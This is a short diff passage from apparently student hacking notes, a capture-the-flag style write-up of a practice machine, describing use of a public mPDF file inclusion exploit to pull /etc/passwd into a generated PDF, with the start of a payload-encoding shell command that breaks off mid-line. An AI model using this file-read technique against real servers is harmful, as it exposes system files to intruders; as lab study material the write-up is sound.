pojntfx/uni-hacking-notes/docs/main.md

 $ xdg-open "http://faculty.htb/mpdf/tmp/${ID}"
 ```

 This returns a PDF with the text "Hello, world!".
-MPDF has a file inclusion exploit ([https://www.exploit-db.com/exploits/50995](https://www.exploit-db.com/exploits/50995)), so let's try to get `/etc/passwd`:
+MPDF has a file inclusion exploit ([https://www.exploit-db.com/exploits/50995](https://www.exploit-db.com/exploits/50995)), so I was able to inject `/etc/passwd` into the generated PDF:

 ```shell
 $ cat <<EOT | jq -sRr @uri | base64 -w 0 > /tmp/body